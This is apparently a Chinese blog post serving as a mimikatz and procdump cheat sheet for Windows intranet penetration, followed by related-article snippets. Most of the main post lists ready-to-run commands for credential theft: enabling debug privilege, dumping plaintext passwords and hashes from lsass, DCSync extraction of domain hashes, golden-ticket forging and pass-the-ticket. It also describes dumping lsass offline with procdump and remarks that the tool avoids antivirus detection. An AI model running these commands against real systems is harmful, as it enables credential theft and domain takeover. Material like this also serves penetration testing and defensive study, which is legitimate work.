【mimikatz】内网渗透工具 下载 基本操作+【procdump】 下载 操作

最新推荐文章于 2024-06-21 19:34:19 发布
最新推荐文章于 2024-06-21 19:34:19 发布
阅读量2.4k 收藏 16
点赞数 9
分类专栏: Windows域渗透 文章标签: 经验分享 windows 测试工具 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65837674/article/details/135541478
版权

【说明】

  • procdump 下载链接及使用方法在文章最后部分 “离线读取lsass.exe”
  • mimikatz 在内网渗透中,windows 2012以上版本中就无法抓取明文密码,需要搭配 procdump.exe 一起使用
  • 下面所有模块命令均在运行 mimikatz 后自带的命令交互界面中执行

mimikatz基本介绍

  • Mimikatz 是一款法国人开发的轻量级的调试工具,通过它可以提升一个进程的权限、读取进程内存等,最大的亮点就是可以直接从 lsass.exe 进程中获取当前登录系统用户名和密码。
  • 关于 lsass.exe ,它是微软 Windows 的系统进程,也是一个安全机制,用于本地安全和登陆策略。通常我们在登录系统时输入用户名和密码之后,密码会存储在 lsass 内存中,经过里面 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中,而 mimikatz 正是通过对 lsass 逆算获取到明文密码。
  • 下载链接:https://github.com/gentilkiwi/mimikatz/

mimikatz内网渗透常用模块与命令

privilege(提权相关模块)

特别说明:privilege::debug 进入mimikatz命令交互界面的首要操作,也是最基本操作!!!

#记住第一个 privilege::debug 就够了,其他的不常用 privilege::debug//调整为调试权限。mimikatz中很多功能都需要该权限

privilege::security     //调整为安全权限 
privilege::restore      //恢复原来权限 
privilege::sysenv       //调整为系统环境权限 
privilege::driver       //调整为装载驱动权限

sekurlsa (与用户凭证相关的模块,可以从 lsass 进程中提取 passwords、keys、tickets等信息)

sekurlsa::msv      //读取用户对应密码的各种加密协议的密文(NTML、SHA1等),低版本windows可以读取为明文
sekurlsa::wdigest     //wdigest凭证,运用程序漏洞可逆的手法去读取密码明文
sekurlsa::tspkg       //tspkg凭证

sekurlsa::logonpasswords    //常用并重点使用!!!直接集成上面多条指令功能,读取用户各种凭证和信息。

sekurlsa::tickets                 //列出kerberos中的票据
sekurlsa::tickets /export         //导出票据

#下面两条命令结合使用,可以将转储的lsass进程为lsass.dmp文件,离线读取内存信息
sekurlsa::minidump <filename>或lsass.dump      //加载对应文件(lsass.dump)
sekurlsa::logonPasswords full        //读取文件信息

kerberos 协议相关模块(常用于 黄金/白银票据)

kerberos::list      //列出系统中的所有票据
kerberos::purge     //清除系统中的票据
kerberos::ptt       //pass-the-ticket,票据传递攻击(内网横移操作)
kerberos::golden    //伪造黄金和白银票据使用,具体构造方法不相同

kerberos::ptc      //票据路径
kerberos::ptc <票据名>    //导入票据

process(进程模块)

process::list      //列出进程列表
process::exports      //导出进程列表
process::start      //开始一个进程
process::stop      //停止一个进程

service(服务管理模块)

service::start         //开始服务。
service::remove        //移除服务。
service::stop         //停止服务。
service::suspend        //暂停服务。
service::resume         //恢复服务。
service::preshutdown    //关闭服务。
service::shutdown       //关闭服务。
service::list           //列出服务。

lsadump(对域控操作模块)

Lsadump::secrets       //从registry获取保存的密码凭据,可以直接获取明文密码。
lsadump::lsa /patch     //读取所有用户的哈希
lsadump::sam      //sam表获取Hash
lsadump::dcsync      //通过dcsync利用目录复制服务(DRS)从NTDS.DIT文件中拿到密码哈希值(在域控权限下获取)
lsadump::dcsync /domain:xxxx.com /user:xxxx       //查看域内指定用户信息,包括NTLM哈希等
lsadump::dcsync /domain:xxxx.com /all /csv       //查看所有域用户

离线读取 lsass.exe 的密码(模拟无法上传 mimikatz 到目标靶机的情况)

方法一:图形化界面操作

  1. 任务管理器找到 lsass.exe 进程
  2. 右键进程,可以选择创建转储文件(相当于导出程序信息),然后就可以看到新建了一个.dmp 后缀的文件。
  3. 最后用 mimikatz 读取dmp文件即可

方法二:【procdum.exe】命令行操作

procdump.exe 工具:微软官方工具,它可以转储exe进程为 dmp 文件

下载链接:https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

  1. 将 procdump.exe 上传到目标靶机,微软官方工具不会报毒
  2. 在工具目录下执行命令,导出dmp文件
  3. 将它下载到有 mimikatz 的主机上,使用mimikatz读取文件信息
procdump.exe -accepteula      #运行程序,并同意该工具的使用条款,相当于在图形化界面勾选 I agree
procdump.exe ‐ma lsass.exe lsass.dmp     #导出lsass.exe进程为lsass.dmp文件

下面使用 mimikatz 读取内存:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
网工吉吉
关注
  • 9
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mimikatz使用以及源码动态分析
weixin_46956745的博客
05-08 2792
mimikatz使用以及源码分析 文章目录mimikatz使用以及源码分析前言一、mimikatz安装运行二、mimikatz源码分析1.函数具体功能2.函数源码分析(动态)总结 前言 Mimikatz 是法国人 Gentil Kiwi 编写的一款 windows 平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取 windows 处于 active 状态账号的明文密码。mimikatz 的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz
mimikatz最新版本
11-20
mimikatz最新版本 嗅探hash
猕猴桃mimikatz.zip
02-12
mimikatz工具 下载地址:https://github.com/gentilkiwi/mimikatz/releases Mimikatz(usr/share/mimikatz)是在Kali上集成的Windows工具Mimikatz2.工具是由法国人所写的,用法跟其他的工具不太一样;
mimikatz工具
03-08
工具可以提取存于windows电脑内存中的密码,安全无毒,最新版工具.
CobaltStrike4.8渗透工具cs下载(有手就会版)
最新发布
2301_79316009的博客
06-21 428
ls -l看teamserver权限,像我这个图就是已经 chmod加权 过了。也可以ctrl+x(x点五下)强制退出rz命令,但是偶尔对文件有损失。小白白,刚上手一般会忘记开端口号50050,而导致客户端会连接超时。3.请求特征:下发的指令,url路径,老版本固定的ua头。这里只需要给予teamserver文件执行权限即可。上传成功后等待一会儿,就会自动取消rz命令的执行。3.2.1给予teamserver文件的权限。如果进行二开魔改后的cs,可提取样本。3.2.2 运行服务端。
mimikazi教程
tomyyyyy
08-24 2026
目录mimikazi教程1、简介1.1、背景介绍1.2、官方链接1.3、mimikatz 与凭证2、基本使用2.1、常用命令2.2、远程连接使用2.3、本地使用2.4、读取域控成员Hash2.4.1、域控本地读取2.4.2、导出域成员Hash2.4.3、secretsdump脚本直接导出域hash2.5、哈希传递2.5.1、工作组环境2.5.2 域环境2.6 票据传递攻击(PTT)2.6.1 黄...
Mimikatz Windows、Linux基本使用
weixin_51741741的博客
12-02 5535
一款密码抓取抓取神器,除了抓取密码之外,听说还可以导出谷歌浏览器的密码,当然第二种我也不会。
mimikatz基础
rnn0921的博客
08-23 374
安装流程(mimikatzWindows上使用老出错,所以我在linux上连接本机使用的)使用详情:用msfvenom控制本机加载mimkatzload kiwi查看命令查看当前目录查看当前目录下的内容尝试下载666.png下载成功!
轻松看懂的加解密系列(5)番外篇III:如何优雅地获取到你同事的电脑登录密码
weixin_41077112的博客
10-02 312
通过介绍利用 mimikatz 攻击实例,告诉普通 Windows 电脑用户如何提高防范意识
procdump32_64+mimikatz.rar
06-15
标题中的"procdump32_64+mimikatz.rar"表明这是一个包含32位和64位版本的procdump工具mimikatz工具的压缩包。这两个工具在IT安全领域中有着重要的作用,特别是对于系统调试和安全审计。 **procdump** Procdump是...
mimikatz工具
01-25
轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! Ping : 百寞' Blog » Blog Archive » 轻量级调试器神器 – mimikatz – 直接...
mimikatz.exe windows密码查看
07-12
cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称---------结束进程 process::modules --列出系统的核心模块及所在位置 service::list---------------列出系统的服务 service::remove-----------移除系统的服务 service::start stop 服务名称--启动或停止服务 privilege::list---------------列出权限列表 privilege::enable--------激活一个或多个权限 privilege::debug-----------------提升权限------------------ nogpo::cmd------------打开系统的cmd.exe nogpo::regedit -----------打开系统的注册表 nogpo::taskmgr-------------打开任务管理器 ts::sessions-----------------显示当前的会话 ts::processes------显示进程和对应的pid情况等 sekurlsa::wdigest-----获取本地用户信息及密码 sekurlsa::tspkg------获取tspkg用户信息及密码 sekurlsa::logonPasswords--获登陆用户信息及密码----------------
mimikatz.rar
07-08
mimikatz 是一款windows平台下的神器,它具备很多功能,我认为最牛逼的是lsass.exe进程中获取windows的账号明文密码,当然他的其他功能也很强大。
mimikatz_trunk.zip
02-26
有可能您忘记了管理员的密码,我们经常需要获取管理员的账号密码,希望大家喜欢。下载工具后,运行exe文件,然后分别运行命令privilege::debug 和 sekurlsa::logonpasswords ,somd5.com解密!
获取win密码明文的神器mimikatz v1.0
11-29
这是法国人开发的工具软件,可以轻松获得window系统中用户密码的明文。适合 winxp/win2003/win7/win2008。而且杀软基本都不杀,因为这不是病毒和木马,只是工具而已。
内网渗透专用-mimikatz
05-06
标题中的"内网渗透专用-mimikatz"明确指出,这个压缩包的内容是与mimikatz相关的,可能包含了该工具的不同版本或特定的使用教程,旨在帮助用户在内网渗透测试中更有效地利用它。 描述中的"懂得都懂!"是一个含蓄的...
procdump+mimikatz.zip
11-14
在IT安全领域,了解并掌握一些关键工具的使用至关重要,其中procdumpmimikatz就是两个经常被提及的名字。这两个工具虽然各自有着不同的功能,但在网络安全分析和防御中都扮演着重要角色。下面将详细探讨它们的基本...
内网渗透工具与流程.pptx
04-10
内网渗透测试是一种网络安全评估方法,用于检测组织内部网络的安全性。这个过程通常由安全专家进行,目的是发现并修复潜在的漏洞,防止未经授权的访问和攻击。以下是对内网渗透流程和工具使用的详细说明: 首先,...
猕猴桃 mimikatz 下载
07-05
### 回答1: 猕猴桃(Mimikatz)是一款用于获取Windows操作系统中用户或系统密码的强大工具。它最初由法国黑客开发,并于2011年首次面世。Mimikatz的主要功能是通过Windows操作系统的内存进行提取和解密敏感信息,如密码、凭证和密钥。为了使用Mimikatz,用户需要下载工具,然后在目标系统中运行它。 Mimikatz下载和使用并非为了进行非法活动,而是一种安全研究和渗透测试工具。安全专家和网络管理员可以使用Mimikatz来测试系统的安全性,发现和修复潜在的漏洞。此外,Mimikatz还可用于检测员工在公司网络中的密码使用情况,以提高整体的网络安全性。 尽管Mimikatz是一款功能强大的工具,但它也可能被黑客和恶意分子用于非法目的。黑客可以将Mimikatz用于渗透攻击,窃取他人的敏感信息,如银行账号、邮箱密码等。因此,使用者应该严格遵守法律法规,只在合法授权的范围内使用Mimikatz。 总之,Mimikatz是一款用于获取Windows操作系统中敏感信息的工具。尽管它可以用于安全研究和网络渗透测试,但需要谨慎使用,以防被黑客滥用。我们应该秉持合法和伦理原则,将这些工具用于提高网络安全,而不是进行非法活动。 ### 回答2: 猕猴桃(Mimikatz)是一种广泛使用的密码审计和凭据攻击工具,它最初由法国安全研究人员Benjamin Delpy开发。Mimikatz被用于检测和获取Windows操作系统中存储的明文凭据,例如登录用户名和密码。它可以通过获取内存中的明文凭据、转储用户登录凭据、解密Windows系统中的密码哈希等方式,实现对系统凭证的获取。 猕猴桃工具下载方式主要有两种。首先,用户可以在Benjamin Delpy的GitHub页面上找到猕猴桃的源代码并进行下载。这是一个开放源代码项目,任何人都可以免费访问和使用。用户可以根据自己的需求选择相应的版本和平台进行下载。 其次,网络上也有一些第三方网站提供猕猴桃工具下载链接。然而,我们必须注意这些源是否可信和安全。由于猕猴桃本身是一种用于渗透测试和安全审计的工具,使用它需要谨慎和合法的目的。因此,下载和使用猕猴桃工具时应尽量避免使用不可信的下载源,以防止下载到经过篡改或恶意注入的版本。 总而言之,猕猴桃是一种密码审计和凭据攻击工具,可用于检测和获取Windows操作系统中的明文凭据。用户可以通过Benjamin Delpy的GitHub页面或其他可靠且安全的下载源来下载并使用这个工具。然而,在使用此类工具时,应牢记合法合规的原则,避免用于非法目的或侵犯他人隐私。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值